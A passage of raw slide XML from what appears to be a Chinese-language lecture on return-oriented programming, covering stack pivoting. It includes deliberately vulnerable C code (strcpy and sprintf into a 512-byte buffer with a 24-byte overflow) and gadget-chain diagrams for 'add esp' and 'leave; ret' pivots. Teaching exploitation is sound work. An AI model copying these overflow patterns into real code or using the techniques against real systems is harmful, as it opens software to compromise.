          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-457189">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPts val="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>栈</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>溢出长度不足以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>使用直接 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>ROP</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-457189">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPts val="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>栈溢出 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>payload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>会出现空字符截断，且</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>gadget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>地址含有空字符</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-457189">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPts val="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>在泄露地址信息后需要新的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>ROP payload</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1734" name="Shape 1734"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6418200" y="4591900"/>
            <a:ext cx="5237600" cy="21140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indent="304792" defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern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void stack_overflow(char *user) {</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0"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304792" defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern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char dst[512];</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0"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304792" defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern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1600" b="1" kern="0" dirty="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sprintf(dst, "%s", user);</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0" dirty="0"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304792" defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern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600" kern="0"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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern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x64 assembly:</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0"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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern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1600" b="1" kern="0" dirty="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0x406113</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" kern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	55         push   %rbp</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0"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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern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1600" b="1" kern="0" dirty="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0x406114</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" kern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	41 89 d4   mov    %edx,%r12d</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0"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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern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...</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0"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735" name="Shape 1735"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="814233" y="4661033"/>
            <a:ext cx="4647200" cy="19064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indent="304792" defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern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void stack_overflow(char *user) {</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0"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304792" defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern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char dst[512];</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0"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304792" defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern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 if (strlen(user) &gt; 536)</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0"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304792" defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern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return;</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0"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609585" defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern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600" b="1" kern="0" dirty="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// 536-512=24 bytes overflow!</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0" dirty="0"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304792" defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern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1600" b="1" kern="0" dirty="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strcpy(dst, user);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" kern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1600" kern="0"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304792" defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern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600" kern="0"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A4166A8-2019-448D-8F6E-ADD095C7D961}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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返回导向编程 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其它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ROP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技巧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" name="Shape 1741"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7148633" y="3373667"/>
            <a:ext cx="2095200" cy="9988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...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742" name="Shape 1742"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7148633" y="4372667"/>
            <a:ext cx="2095200" cy="4096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pivot gadget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743" name="Shape 1743"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7148633" y="2964067"/>
            <a:ext cx="2095200" cy="4096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gadget 1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744" name="Shape 1744"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2378167" y="4307867"/>
            <a:ext cx="3000400" cy="5392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add esp, 0x6C ; ret ;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745" name="Shape 1745"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7148633" y="2554467"/>
            <a:ext cx="2095200" cy="4096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...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746" name="Shape 1746"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2378167" y="2489667"/>
            <a:ext cx="3000400" cy="5392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ROP payload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747" name="Shape 1747"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7148633" y="2144867"/>
            <a:ext cx="2095200" cy="4096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gadget N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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1748" name="Shape 1748"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1742" idx="1"/>
            <a:endCxn id="1744" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5378633" y="4577467"/>
            <a:ext cx="17700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749" name="Shape 1749"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6540000" y="2259867"/>
            <a:ext cx="539200" cy="998800"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 8333"/>
              <a:gd name="adj2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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1750" name="Shape 1750"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1749" idx="1"/>
            <a:endCxn id="1746" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5378400" y="2759267"/>
            <a:ext cx="11616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751" name="Shape 1751"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5713773" y="4567967"/>
            <a:ext cx="848800" cy="4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ESP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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1752" name="Shape 1752"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6611040" y="4772767"/>
            <a:ext cx="537600" cy="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753" name="Shape 1753"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2378167" y="5259700"/>
            <a:ext cx="3000400" cy="5392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" sz="1867" b="1" kern="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stack overflow; ret;</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="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1754" name="Shape 1754"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1753" idx="0"/>
            <a:endCxn id="1744" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3878367" y="4846900"/>
            <a:ext cx="0" cy="4128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755" name="Shape 1755"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1744" idx="0"/>
            <a:endCxn id="1746" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3878367" y="3028667"/>
            <a:ext cx="0" cy="12792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9" name="Shape 1732">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5AD42AE5-2170-433F-8ECE-6A883123F574}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1030877" y="870178"/>
            <a:ext cx="1419246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zh-CN" altLang="en-US" sz="2400" kern="0"/>
              <a:t>栈迁移</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" kern="0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9670FB9E-443C-4F18-AD8C-31724769155C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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返回导向编程 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其它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ROP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技巧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" name="Shape 1761"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7148633" y="3373667"/>
            <a:ext cx="2095200" cy="9988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0x6c bytes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762" name="Shape 1762"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7148633" y="4372667"/>
            <a:ext cx="2095200" cy="4096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pivot gadget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763" name="Shape 1763"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7148633" y="2964067"/>
            <a:ext cx="2095200" cy="4096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gadget 1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764" name="Shape 1764"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2378167" y="4307867"/>
            <a:ext cx="3000400" cy="5392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" sz="1867" b="1" kern="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add esp, 0x6C ; ret ;</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF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765" name="Shape 1765"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7148633" y="2554467"/>
            <a:ext cx="2095200" cy="4096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...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766" name="Shape 1766"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2378167" y="2489667"/>
            <a:ext cx="3000400" cy="5392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ROP payload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767" name="Shape 1767"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7148633" y="2144867"/>
            <a:ext cx="2095200" cy="4096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gadget N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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1768" name="Shape 1768"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1762" idx="1"/>
            <a:endCxn id="1764" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5378633" y="4577467"/>
            <a:ext cx="17700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769" name="Shape 1769"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6540000" y="2259867"/>
            <a:ext cx="539200" cy="998800"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 8333"/>
              <a:gd name="adj2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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1770" name="Shape 1770"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1769" idx="1"/>
            <a:endCxn id="1766" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5378400" y="2759267"/>
            <a:ext cx="11616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771" name="Shape 1771"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5713773" y="4161567"/>
            <a:ext cx="848800" cy="4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ESP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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1772" name="Shape 1772"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6611040" y="4366367"/>
            <a:ext cx="537600" cy="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773" name="Shape 1773"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2378167" y="5259700"/>
            <a:ext cx="3000400" cy="5392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stack overflow; ret;</a:t>
            </a:r>
            <a:endParaRPr sz="1867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1774" name="Shape 1774"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1773" idx="0"/>
            <a:endCxn id="1764" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3878367" y="4846900"/>
            <a:ext cx="0" cy="4128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775" name="Shape 1775"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1764" idx="0"/>
            <a:endCxn id="1766" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3878367" y="3028667"/>
            <a:ext cx="0" cy="12792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1" name="Shape 1732">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E288A163-7310-4EB1-894C-69C1D1E8764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0" y="869950"/>
            <a:ext cx="1419225" cy="585788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zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>栈迁移</a:t>
            </a:r>
            <a:endParaRPr sz="2400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4BFA75C4-1DCB-4F34-B3C6-622B49CD0511}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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返回导向编程 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其它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ROP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技巧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" name="Shape 1781"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7148633" y="3373667"/>
            <a:ext cx="2095200" cy="9988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...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782" name="Shape 1782"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7148633" y="4372667"/>
            <a:ext cx="2095200" cy="4096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pivot gadget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783" name="Shape 1783"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7148633" y="2964067"/>
            <a:ext cx="2095200" cy="4096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gadget 1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784" name="Shape 1784"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2378167" y="4307867"/>
            <a:ext cx="3000400" cy="5392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add esp, 0x6C ; ret ;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785" name="Shape 1785"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7148633" y="2554467"/>
            <a:ext cx="2095200" cy="4096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...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786" name="Shape 1786"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2378167" y="2489667"/>
            <a:ext cx="3000400" cy="5392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" sz="1867" b="1" kern="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ROP payload</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF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787" name="Shape 1787"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7148633" y="2144867"/>
            <a:ext cx="2095200" cy="4096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gadget N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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1788" name="Shape 1788"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1782" idx="1"/>
            <a:endCxn id="1784" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5378633" y="4577467"/>
            <a:ext cx="17700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789" name="Shape 1789"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6540000" y="2259867"/>
            <a:ext cx="539200" cy="998800"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 8333"/>
              <a:gd name="adj2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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1790" name="Shape 1790"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1789" idx="1"/>
            <a:endCxn id="1786" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5378400" y="2759267"/>
            <a:ext cx="11616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791" name="Shape 1791"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5713773" y="2752993"/>
            <a:ext cx="848800" cy="4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ESP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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1792" name="Shape 1792"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6611040" y="2957793"/>
            <a:ext cx="537600" cy="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793" name="Shape 1793"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2378167" y="5259700"/>
            <a:ext cx="3000400" cy="5392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stack overflow; ret;</a:t>
            </a:r>
            <a:endParaRPr sz="1867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1794" name="Shape 1794"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1793" idx="0"/>
            <a:endCxn id="1784" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3878367" y="4846900"/>
            <a:ext cx="0" cy="4128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795" name="Shape 1795"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1784" idx="0"/>
            <a:endCxn id="1786" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3878367" y="3028667"/>
            <a:ext cx="0" cy="12792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1" name="Shape 1732">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83519AA1-D96A-479D-A389-EEF6280FBE1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0" y="869950"/>
            <a:ext cx="1419225" cy="585788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zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>栈迁移</a:t>
            </a:r>
            <a:endParaRPr sz="2400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EB814168-B3DD-4122-BA33-9422BA60CAA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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返回导向编程 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其它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ROP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技巧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0" name="Shape 1800"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="593725"/>
            <a:ext cx="11360150" cy="763588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zh-CN" altLang="en-US" dirty="0"/>
              <a:t>栈迁移</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>: "pop ebp ret" + "leave ret"</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1801" name="Shape 1801"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8164700" y="4571167"/>
            <a:ext cx="2095200" cy="7636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pop ebp ret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802" name="Shape 1802"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8164633" y="2488733"/>
            <a:ext cx="2095200" cy="2904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new ebp value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803" name="Shape 1803"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3394167" y="4751667"/>
            <a:ext cx="3000400" cy="4096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pop ebp ; ret ;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804" name="Shape 1804"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3394167" y="1777533"/>
            <a:ext cx="3000400" cy="5392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ROP payload 2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805" name="Shape 1805"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8164633" y="1907933"/>
            <a:ext cx="2095200" cy="2904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...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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1806" name="Shape 1806"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1801" idx="1"/>
            <a:endCxn id="1803" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6394700" y="4952967"/>
            <a:ext cx="1770000" cy="36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807" name="Shape 1807"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7556000" y="1665333"/>
            <a:ext cx="539200" cy="763600"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 8333"/>
              <a:gd name="adj2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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1808" name="Shape 1808"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1807" idx="1"/>
            <a:endCxn id="1804" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="6394400" y="2047133"/>
            <a:ext cx="11616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809" name="Shape 1809"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6729840" y="5121033"/>
            <a:ext cx="848800" cy="4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ESP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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1810" name="Shape 1810"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7627107" y="5325833"/>
            <a:ext cx="537600" cy="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811" name="Shape 1811"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3394167" y="5816967"/>
            <a:ext cx="3000400" cy="5392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" sz="1867" b="1" kern="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stack overflow; ret;</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="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1812" name="Shape 1812"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1811" idx="0"/>
            <a:endCxn id="1803" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4894367" y="5161367"/>
            <a:ext cx="0" cy="6556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813" name="Shape 1813"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="939500" y="3200736"/>
            <a:ext cx="2095200" cy="5392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" sz="1600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mov   esp, ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1600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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600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pop   ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1600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814" name="Shape 1814"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3393800" y="3265536"/>
            <a:ext cx="3000400" cy="4096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leave ; ret ;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815" name="Shape 1815"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8164633" y="3088536"/>
            <a:ext cx="2095200" cy="7636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leave ret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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1816" name="Shape 1816"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1803" idx="0"/>
            <a:endCxn id="1814" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4893967" y="3675267"/>
            <a:ext cx="400" cy="10764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817" name="Shape 1817"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1815" idx="1"/>
            <a:endCxn id="1814" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="6394233" y="3470336"/>
            <a:ext cx="17704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818" name="Shape 1818"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3200433" y="3318336"/>
